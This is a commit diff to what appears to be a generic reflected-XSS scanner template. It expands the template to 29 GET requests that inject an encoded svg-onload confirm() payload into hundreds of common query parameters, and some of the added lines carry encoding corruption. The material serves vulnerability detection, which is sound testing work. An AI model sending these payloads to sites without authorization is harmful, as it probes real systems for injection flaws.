Larger number of XSS params
Krzysztof Zając
parent
52ef767133
commit
5373f0f54d
|
|
@ -10,16 +10,42 @@ info:
|
|||
cvss-score: 7.2
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
max-request: 3
|
||||
max-request: 29
|
||||
parameters: q,s,search,id,action,keyword,query,page,keywords,url,view,cat,name,key,p,month,page_id,password,terms,token,type,unsubscribe_token,api,api_key,begindate,callback,categoryid,csrf_token,email,emailto,enddate,immagine,item,jsonp,l,lang,list_type,year
|
||||
tags: xss,generic
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/?q=%27%3E%22%3Csvg%2Fonload=confirm%28%27q%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27s%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27search%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27id%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27action%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27keyword%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27query%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27page%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27keywords%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27url%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27view%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27cat%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27name%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27key%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27p%27%29%3E"
|
||||
- "{{BaseURL}}/?api=%27%3E%22%3Csvg%2Fonload=confirm%28%27api%27%29%3E&api_key=%27%3E%22%3Csvg%2Fonload=confirm%28%27api_key%27%29%3E&begindate=%27%3E%22%3Csvg%2Fonload=confirm%28%27begindate%27%29%3E&callback=%27%3E%22%3Csvg%2Fonload=confirm%28%27callback%27%29%3E&categoryid=%27%3E%22%3Csvg%2Fonload=confirm%28%27categoryid%27%29%3E&csrf_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27csrf_token%27%29%3E&email=%27%3E%22%3Csvg%2Fonload=confirm%28%27email%27%29%3E&emailto=%27%3E%22%3Csvg%2Fonload=confirm%28%27emailto%27%29%3E&enddate=%27%3E%22%3Csvg%2Fonload=confirm%28%27enddate%27%29%3E&immagine=%27%3E%22%3Csvg%2Fonload=confirm%28%27immagine%27%29%3E&item=%27%3E%22%3Csvg%2Fonload=confirm%28%27item%27%29%3E&jsonp=%27%3E%22%3Csvg%2Fonload=confirm%28%27jsonp%27%29%3E&l=%27%3E%22%3Csvg%2Fonload=confirm%28%27l%27%29%3E&lang=%27%3E%22%3Csvg%2Fonload=confirm%28%27lang%27%29%3E&list_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27list_type%27%29%3E"
|
||||
- "{{BaseURL}}/?month=%27%3E%22%3Csvg%2Fonload=confirm%28%27month%27%29%3E&page_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27page_id%27%29%3E&password=%27%3E%22%3Csvg%2Fonload=confirm%28%27password%27%29%3E&terms=%27%3E%22%3Csvg%2Fonload=confirm%28%27terms%27%29%3E&token=%27%3E%22%3Csvg%2Fonload=confirm%28%27token%27%29%3E&type=%27%3E%22%3Csvg%2Fonload=confirm%28%27type%27%29%3E&unsubscribe_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27unsubscribe_token%27%29%3E&year=%27%3E%22%3Csvg%2Fonload=confirm%28%27year%27%29%3E"
|
||||
- "{{BaseURL}}/?items=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-items27%29%3E&plugin=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-plugin27%29%3E&info=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-info27%29%3E¶ms=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-params27%29%3E&option=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-option27%29%3E&tablename=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tablename27%29%3E&t=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-t27%29%3E&options=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-options27%29%3E&error=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-error27%29%3E&post_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_id27%29%3E&state=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-state27%29%3E&set=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-set27%29%3E&link_url=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-link_url27%29%3E&fname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-fname27%29%3E"
|
||||
- "{{BaseURL}}/?part=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-part27%29%3E&q=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-q27%29%3E&menu-locations=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-menu-locations27%29%3E&product_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-product_id27%29%3E&enable=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-enable27%29%3E&address=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-address27%29%3E&preview_nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview_nonce27%29%3E&meta=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-meta27%29%3E&mail=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mail27%29%3E&allusers=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-allusers27%29%3E&metakeyselect=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-metakeyselect27%29%3E&h=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-h27%29%3E&all=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-all27%29%3E&language=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-language27%29%3E"
|
||||
- "{{BaseURL}}/?go=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-go27%29%3E&height=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-height27%29%3E&pwd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pwd27%29%3E&city=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-city27%29%3E&tax=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tax27%29%3E&term=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-term27%29%3E&checkemail=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-checkemail27%29%3E&password=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-password27%29%3E&charset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-charset27%29%3E&gmt_offset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-gmt_offset27%29%3E&end_date=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-end_date27%29%3E&client_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-client_id27%29%3E&phone=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-phone27%29%3E&new_role=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-new_role27%29%3E"
|
||||
- "{{BaseURL}}/?month=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-month27%29%3E&insert=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-insert27%29%3E&edit=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-edit27%29%3E&ip=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ip27%29%3E&g=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-g27%29%3E&signup_for=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-signup_for27%29%3E&start=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-start27%29%3E&export=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-export27%29%3E&redirect_to=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-redirect_to27%29%3E&untrashed=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-untrashed27%29%3E&wp_screen_options=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-wp_screen_options27%29%3E&active=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-active27%29%3E&secret=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-secret27%29%3E&module=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-module27%29%3E"
|
||||
- "{{BaseURL}}/?gid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-gid27%29%3E&xml=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-xml27%29%3E&attachment=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-attachment27%29%3E&position=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-position27%29%3E&noheader=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-noheader27%29%3E&text=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-text27%29%3E&input=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-input27%29%3E&new=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-new27%29%3E&db_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-db_name27%29%3E&r=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-r27%29%3E&groups=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-groups27%29%3E&firstname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-firstname27%29%3E&blog=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-blog27%29%3E&plugins=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-plugins27%29%3E"
|
||||
- "{{BaseURL}}/?newcontent=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-newcontent27%29%3E&d=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-d27%29%3E&postid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-postid27%29%3E&menu=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-menu27%29%3E&image=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-image27%29%3E&range=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-range27%29%3E&order_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-order_id27%29%3E&end=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-end27%29%3E&subject=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-subject27%29%3E&port=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-port27%29%3E&selection=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-selection27%29%3E&foo=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-foo27%29%3E&screen=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-screen27%29%3E&userid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-userid27%29%3E"
|
||||
- "{{BaseURL}}/?import=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-import27%29%3E&tid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tid27%29%3E&sticky=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sticky27%29%3E&widget=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget27%29%3E&create=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-create27%29%3E&file=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-file27%29%3E&up=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-up27%29%3E&timezone=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timezone27%29%3E&reason=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-reason27%29%3E&username=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-username27%29%3E&filter=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-filter27%29%3E&path=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-path27%29%3E&send=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-send27%29%3E&trigger=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-trigger27%29%3E"
|
||||
- "{{BaseURL}}/?name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-name27%29%3E&uid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-uid27%29%3E&plugin_status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-plugin_status27%29%3E&field_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-field_id27%29%3E&type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-type27%29%3E&country=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-country27%29%3E&tables=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tables27%29%3E&tags=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tags27%29%3E&=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-27%29%3E&admin_email=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-admin_email27%29%3E&context=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-context27%29%3E&description=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-description27%29%3E&metakeyinput=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-metakeyinput27%29%3E&target=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-target27%29%3E"
|
||||
- "{{BaseURL}}/?submit=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-submit27%29%3E&post_title=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_title27%29%3E&enabled=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-enabled27%29%3E&mode=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mode27%29%3E&attachments=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-attachments27%29%3E&db=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-db27%29%3E&preview_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview_id27%29%3E&offset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-offset27%29%3E&callback=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-callback27%29%3E&object=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-object27%29%3E&api_key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-api_key27%29%3E&orderby=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-orderby27%29%3E&fields=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-fields27%29%3E&mod=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mod27%29%3E"
|
||||
- "{{BaseURL}}/?settings=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-settings27%29%3E&tag=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tag27%29%3E&do=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-do27%29%3E&script=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-script27%29%3E&show=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-show27%29%3E&cmd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cmd27%29%3E&link=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-link27%29%3E&debug=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-debug27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-keyword27%29%3E&opt=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-opt27%29%3E&method=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-method27%29%3E&remove=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-remove27%29%3E&mobile=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mobile27%29%3E&user_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_name27%29%3E"
|
||||
- "{{BaseURL}}/?n=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-n27%29%3E&comment=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comment27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-p27%29%3E&parent=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-parent27%29%3E&_ajax_nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_ajax_nonce27%29%3E&reverse=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-reverse27%29%3E&post_mime_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_mime_type27%29%3E&list=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-list27%29%3E&content=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-content27%29%3E&multi_number=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-multi_number27%29%3E&comment_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comment_ID27%29%3E&code=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-code27%29%3E&uname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-uname27%29%3E&delete_widget=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-delete_widget27%29%3E"
|
||||
- "{{BaseURL}}/?x=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-x27%29%3E&comments=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comments27%29%3E&text-color=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-text-color27%29%3E&location=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-location27%29%3E&preview=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview27%29%3E&signature=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-signature27%29%3E&desc=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-desc27%29%3E&ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ID27%29%3E&nickname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-nickname27%29%3E&start_date=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-start_date27%29%3E&e=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-e27%29%3E&=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-27%29%3E&disabled=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-disabled27%29%3E&date=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-date27%29%3E"
|
||||
- "{{BaseURL}}/?body=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-body27%29%3E&domain=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-domain27%29%3E&newname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-newname27%29%3E&op=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-op27%29%3E&post_status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_status27%29%3E&id_base=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-id_base27%29%3E&value=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-value27%29%3E&i=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-i27%29%3E&pass=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pass27%29%3E&form=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-form27%29%3E&log=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-log27%29%3E&customized=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-customized27%29%3E&oauth_verifier=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-oauth_verifier27%29%3E&act=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-act27%29%3E"
|
||||
- "{{BaseURL}}/?limit=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-limit27%29%3E&stylesheet=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-stylesheet27%29%3E&link_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-link_id27%29%3E&src=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-src27%29%3E&level=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-level27%29%3E&widget_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget_id27%29%3E&table=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-table27%29%3E×tamp=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timestamp27%29%3E&cookie=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cookie27%29%3E&stage=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-stage27%29%3E&hidden=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-hidden27%29%3E&order=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-order27%29%3E&output=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-output27%29%3E&request=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-request27%29%3E"
|
||||
- "{{BaseURL}}/?locale=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-locale27%29%3E&version=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-version27%29%3E&site=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-site27%29%3E&weblog_title=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-weblog_title27%29%3E&move=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-move27%29%3E&tax_input=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tax_input27%29%3E&clone=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-clone27%29%3E&_wp_http_referer=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_wp_http_referer27%29%3E&class=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-class27%29%3E&source=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-source27%29%3E&rememberme=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-rememberme27%29%3E&success=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-success27%29%3E&pid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pid27%29%3E&json=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-json27%29%3E"
|
||||
- "{{BaseURL}}/?template=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-template27%29%3E&string=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-string27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-query27%29%3E&event=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-event27%29%3E&where=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-where27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-keywords27%29%3E&group_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-group_id27%29%3E¬es=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-notes27%29%3E&next=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-next27%29%3E&timezone_string=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timezone_string27%29%3E¬e=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-note27%29%3E&menu-item=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-menu-item27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-s27%29%3E&category=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-category27%29%3E"
|
||||
- "{{BaseURL}}/?u=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-u27%29%3E&cid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cid27%29%3E&a=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-a27%29%3E&lastname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-lastname27%29%3E&c=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-c27%29%3E&noconfirmation=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-noconfirmation27%29%3E&out_trade_no=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-out_trade_no27%29%3E&color=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-color27%29%3E&sid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sid27%29%3E&blog_public=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-blog_public27%29%3E&files=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-files27%29%3E&check=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-check27%29%3E§ion=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-section27%29%3E&referer=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-referer27%29%3E"
|
||||
- "{{BaseURL}}/?img=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-img27%29%3E&theme=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-theme27%29%3E&invalid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-invalid27%29%3E&m=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-m27%29%3E&post_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_type27%29%3E&dl=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dl27%29%3E&edit-menu-item=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-edit-menu-item27%29%3E&what=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-what27%29%3E&login=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-login27%29%3E&html=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-html27%29%3E&pass2=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pass227%29%3E&modify=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-modify27%29%3E&sort=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sort27%29%3E&g-recaptcha-response=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-g-recaptcha-response27%29%3E"
|
||||
- "{{BaseURL}}/?author=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-author27%29%3E&direction=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-direction27%29%3E&replytocom=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-replytocom27%29%3E&add=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-add27%29%3E&paged=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-paged27%29%3E&download=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-download27%29%3E&server=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-server27%29%3E&cancel=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cancel27%29%3E&category_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-category_id27%29%3E&csrf_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-csrf_token27%29%3E&comment_status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comment_status27%29%3E&auth=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-auth27%29%3E&shortcode=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-shortcode27%29%3E&dir=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dir27%29%3E"
|
||||
- "{{BaseURL}}/?dismiss=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dismiss27%29%3E&media=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-media27%29%3E&activate=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-activate27%29%3E&filename=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-filename27%29%3E&data=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-data27%29%3E&md5=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-md527%29%3E&timeout=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timeout27%29%3E&ids=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ids27%29%3E&num=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-num27%29%3E&oitar=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-oitar27%29%3E&val=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-val27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cat27%29%3E&o=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-o27%29%3E&admin_password=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-admin_password27%29%3E"
|
||||
- "{{BaseURL}}/?page_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-page_id27%29%3E&user_email=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_email27%29%3E&msg=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-msg27%29%3E&token=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-token27%29%3E&return=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-return27%29%3E&provider=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-provider27%29%3E&users=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-users27%29%3E&captcha=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-captcha27%29%3E&select=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-select27%29%3E&admin=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-admin27%29%3E&show_sticky=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-show_sticky27%29%3E&parent_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-parent_id27%29%3E&amount=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-amount27%29%3E&count=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-count27%29%3E"
|
||||
